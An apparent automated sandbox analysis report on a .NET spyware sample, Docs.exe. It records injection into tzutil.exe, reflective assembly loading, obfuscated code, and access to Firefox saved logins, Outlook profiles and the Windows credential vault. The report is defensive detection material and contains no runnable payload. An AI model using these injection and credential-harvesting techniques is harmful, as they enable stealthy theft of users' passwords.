                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F4340 NtSetContextThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F4650 NtSuspendThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2BA0 NtEnumerateValueKey, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2BF0 NtAllocateVirtualMemory, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2BE0 NtQueryValueKey, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2B60 NtClose, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2AD0 NtReadFile, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2AF0 NtWriteFile, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2FB0 NtResumeThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2FE0 NtCreateFile, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2F30 NtCreateSection, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2E80 NtReadVirtualMemory, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2EE0 NtQueueApcThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2DD0 NtDelayExecution, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2DF0 NtQuerySystemInformation, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2D10 NtMapViewOfSection, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2D30 NtUnmapViewOfSection, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2CA0 NtQueryInformationToken, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2C70 NtFreeVirtualMemory, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2C60 NtCreateKey, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F35C0 NtCreateMutant, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F39B0 NtGetContextThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2B80 NtQueryInformationFile
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2AB0 NtWaitForSingleObject
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2F90 NtProtectVirtualMemory
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2FA0 NtQuerySection
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2F60 NtCreateProcessEx
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2EA0 NtAdjustPrivilegesToken
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2E30 NtWriteVirtualMemory
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2DB0 NtEnumerateKey
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2D00 NtSetInformationFile
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2CC0 NtQueryVirtualMemory
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2CF0 NtOpenProcess
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F2C00 NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F3090 NtSetValueKey
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F3010 NtOpenDirectoryObject
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F3D10 NtOpenProcessToken
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_039F3D70 NtOpenThread
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_03229780 NtClose
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_032296E0 NtDeleteFile
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_032295F0 NtReadFile
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_03229480 NtCreateFile
                      Source: C:\Windows\SysWOW64\tzutil.exe, Code function: 7_2_032298E0 NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_0322BD507_2_0322BD50
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03CDE5447_2_03CDE544
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03CDE4267_2_03CDE426
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03CDD9A87_2_03CDD9A8
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03CDE8DC7_2_03CDE8DC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03CDCC487_2_03CDCC48
Source: C:\Users\user\Desktop\Docs.exe | Code function: String function: 015E5130 appears 58 times
Source: C:\Users\user\Desktop\Docs.exe | Code function: String function: 0161EA12 appears 86 times
Source: C:\Users\user\Desktop\Docs.exe | Code function: String function: 0162F290 appears 105 times
Source: C:\Users\user\Desktop\Docs.exe | Code function: String function: 0159B970 appears 280 times
Source: C:\Users\user\Desktop\Docs.exe | Code function: String function: 015F7E54 appears 111 times
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 039F5130 appears 58 times
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 039AB970 appears 280 times
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 03A3F290 appears 105 times
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 03A07E54 appears 111 times
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 03A2EA12 appears 86 times
Source: Docs.exe, 00000000.00000002.2061144742.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Docs.exe
Source: Docs.exe, 00000000.00000000.2027917488.0000000000856000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameowNk.exe4 vs Docs.exe
Source: Docs.exe, 00000000.00000002.2064805935.0000000007030000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs Docs.exe
Source: Docs.exe, 00000000.00000002.2065086730.0000000008B60000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Docs.exe
Source: Docs.exe, 00000000.00000002.2061956351.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs Docs.exe
Source: Docs.exe, 00000000.00000002.2061498149.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs Docs.exe
Source: Docs.exe, 00000003.00000002.2596435767.0000000001127000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenametzutil.exej% vs Docs.exe
Source: Docs.exe, 00000003.00000002.2596611409.000000000169D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Docs.exe
Source: Docs.exe, 00000003.00000002.2596435767.0000000001108000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenametzutil.exej% vs Docs.exe
Source: Docs.exe | Binary or memory string: OriginalFilenameowNk.exe4 vs Docs.exe
Source: Docs.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Docs.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, kAOj1Y7pfP90kycNNw.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Docs.exe.7030000.5.raw.unpack, kAOj1Y7pfP90kycNNw.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, DQWwse1XRyErqWj6ZE.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Docs.exe.8b60000.6.raw.unpack, LLRcuY9QD6tGN0vbZw.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Docs.exe.8b60000.6.raw.unpack, LLRcuY9QD6tGN0vbZw.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Docs.exe.8b60000.6.raw.unpack, LLRcuY9QD6tGN0vbZw.cs | Security API names: _0020.AddAccessRule
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, LLRcuY9QD6tGN0vbZw.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, LLRcuY9QD6tGN0vbZw.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, LLRcuY9QD6tGN0vbZw.cs | Security API names: _0020.AddAccessRule
Source: 0.2.Docs.exe.8b60000.6.raw.unpack, DQWwse1XRyErqWj6ZE.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@6/3
Source: C:\Users\user\Desktop\Docs.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Docs.exe.log
Source: C:\Users\user\Desktop\Docs.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\tzutil.exe | File created: C:\Users\user\AppData\Local\Temp\UQ63g7r-
Source: Docs.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Docs.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Docs.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: tzutil.exe, 00000007.00000002.3288094917.0000000003594000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2778907770.0000000003572000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2778907770.0000000003594000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2778791386.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3288094917.00000000035C9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Docs.exe | ReversingLabs: Detection: 36%
Source: unknown | Process created: C:\Users\user\Desktop\Docs.exe "C:\Users\user\Desktop\Docs.exe"
Source: C:\Users\user\Desktop\Docs.exe | Process created: C:\Users\user\Desktop\Docs.exe "C:\Users\user\Desktop\Docs.exe"
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
Source: C:\Windows\SysWOW64\tzutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Docs.exe | Process created: C:\Users\user\Desktop\Docs.exe "C:\Users\user\Desktop\Docs.exe"
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
Source: C:\Windows\SysWOW64\tzutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Docs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\Docs.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\tzutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Docs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Docs.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Docs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: owNk.pdbSHA256k | source: tzutil.exe, 00000007.00000002.3290025914.000000000405C000.00000004.10000000.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000000.2666355182.0000000002D9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2885351736.00000000196EC000.00000004.80000000.00040000.00000000.sdmp, Docs.exe
Source: Binary string: tzutil.pdbGCTL | source: Docs.exe, 00000003.00000002.2596435767.0000000001108000.00000004.00000020.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3288966873.00000000015D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: hrhhgLQrQIpiVv.exe, 00000006.00000002.3287825092.00000000003CE000.00000002.00000001.01000000.0000000C.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3287843447.00000000003CE000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP | source: Docs.exe, 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2599187804.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2596619610.0000000003613000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Docs.exe, Docs.exe, 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2599187804.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2596619610.0000000003613000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: owNk.pdb | source: tzutil.exe, 00000007.00000002.3290025914.000000000405C000.00000004.10000000.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000000.2666355182.0000000002D9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2885351736.00000000196EC000.00000004.80000000.00040000.00000000.sdmp, Docs.exe
Source: Binary string: tzutil.pdb | source: Docs.exe, 00000003.00000002.2596435767.0000000001108000.00000004.00000020.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3288966873.00000000015D8000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, kAOj1Y7pfP90kycNNw.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Docs.exe.7030000.5.raw.unpack, kAOj1Y7pfP90kycNNw.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, GtaAIbrHXObmMm8GPA.cs | .Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, LLRcuY9QD6tGN0vbZw.cs | .Net Code: UPBpNEXTKV System.Reflection.Assembly.Load(byte[])
Source: 0.2.Docs.exe.7030000.5.raw.unpack, GtaAIbrHXObmMm8GPA.cs | .Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
Source: 0.2.Docs.exe.8b60000.6.raw.unpack, LLRcuY9QD6tGN0vbZw.cs | .Net Code: UPBpNEXTKV System.Reflection.Assembly.Load(byte[])
Source: Docs.exe | Static PE information: 0x8293E54F [Fri Jun 3 16:16:15 2039 UTC]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 0_2_00E8EFB0 push esp; iretd 0_2_00E8EFB1
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_004031D0 push eax; ret 3_2_004031D2
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_004169E7 push 0F6CFD2Bh; ret 3_2_00416A18
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00423A0A push esp; ret 3_2_00423A0D
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00419359 push ds; ret 3_2_0041935B
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00418366 pushad ; iretd 3_2_00418367
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00408325 push dword ptr [ebx+5Dh]; ret 3_2_0040830B
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00417388 push edi; ret 3_2_0041738D
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00419477 push edx; ret 3_2_00419485
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00408403 push 00000074h; iretd 3_2_0040840B
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00417411 push eax; ret 3_2_00417414
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00411D6F push ds; iretd 3_2_00411DBD
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00411D7B push ds; iretd 3_2_00411DBD
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0041758A push ebp; ret 3_2_004175A6
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0040D66A push ecx; iretd 3_2_0040D6D9
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00414E05 push cs; retf 3_2_00414E14
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0040860D push cs; retf 3_2_0040860E
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00413E93 pushfd ; ret 3_2_00413F00
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00413EBC pushfd ; ret 3_2_00413F00
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0157225F pushad ; ret 3_2_015727F9
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015727FA pushad ; ret 3_2_015727F9
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015A09AD push ecx; mov dword ptr [esp], ecx 3_2_015A09B6
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0157283D push eax; iretd 3_2_01572858
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0157135E push eax; iretd 3_2_01571369
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Code function: 6_2_0359AB76 push 0F6CFD2Bh; ret 6_2_0359ABB0
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Code function: 6_2_03599B82 push ebp; iretd 6_2_03599B83
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Code function: 6_2_03598054 pushfd ; ret 6_2_03598098
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Code function: 6_2_03591802 push ecx; iretd 6_2_03591871
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Code function: 6_2_0359802B pushfd ; ret 6_2_03598098
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Code function: 6_2_03595F13 push ds; iretd 6_2_03595F55
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Code function: 6_2_03595F07 push ds; iretd 6_2_03595F55
Source: Docs.exe | Static PE information: section name: .text entropy: 7.815105086784425
Source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, FZaOUuOPvnEAfIAr0M.cs | High entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
Source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, GtaAIbrHXObmMm8GPA.cs | High entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
Source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, kAOj1Y7pfP90kycNNw.cs | High entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, tOvqPEEmjuKEoeJGrh.cs | High entropy of concatenated method names: 'JEqa6lgqiC', 'wTta2avUjA', 'LWwaN0yiow', 'iLCabpbCAs', 'YYoaZk4KsH', 'u0BamdKlkf', 'TrVahpyGPH', 'hPta1jDirS', 'IhvaxmfhTW', 'BtMaC2GKqu'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, Sujubw793b4CV83kcR.cs | High entropy of concatenated method names: 'g2Ug53IkKb', 'a2QgWEN9Au', 'KsAg05UJEV', 'JhTgVcbOJB', 'G44go1nQZT', 'k0ygGAnUVi', 'igYgdZ2s3w', 'vX6gMISCYi', 'gwjgEbnvF7', 'X08gc3bR3w'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, hgyZIKVeIJNN9ZrHUA.cs | High entropy of concatenated method names: 'dfhQSXDLYT', 'QlRQ68vU89', 'PLDQNojrQ7', 'wxeQb4Riae', 'HhEQmPWOuK', 'XpRQhGbPcW', 'uVeQxLNrfj', 'zpWQCixKwX', 'FLpSkfWJN9C3QEcGutU', 'OLrdkJWBVJtupJK2gZA'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, C1IPTFCEHvZa9pRlnZ.cs | High entropy of concatenated method names: 'ddUvZ9f4DD', 'g1gvhjZLrn', 'uT6y0YPdFw', 'anLyVvtY90', 'EDcyoeVTb9', 'tTHyG1A19K', 'rhAydtDJlx', 'd5IyMV9PoG', 'AwmyEFnKs7', 'XcgycZsYG9'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, egIQWQ8OKY337c9e9S.cs | High entropy of concatenated method names: 'LiRqDQOxT6', 'ESRqnbIqyq', 'QMSTXq4PqG', 'KoOT4Q79xn', 'y9UqItn9SJ', 'H7mqR9pQxy', 'OBIqOPUGja', 'SmNqJupQVo', 'Oxuqf7NwZa', 'rqRqrQaIBe'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, Y35Cx9OYpHrOYEfs3N.cs | High entropy of concatenated method names: 'darH1VuPVx', 'XGBHxqTwhD', 'V4cH5J9pbq', 'sbRHW9Yw3h', 'Vd8HVQRu4V', 'KrCHo35ORB', 'Pa5HdxtQTM', 'j3VHMQmMEm', 'pIdHcZ7t7X', 'QL8HICC1yn'
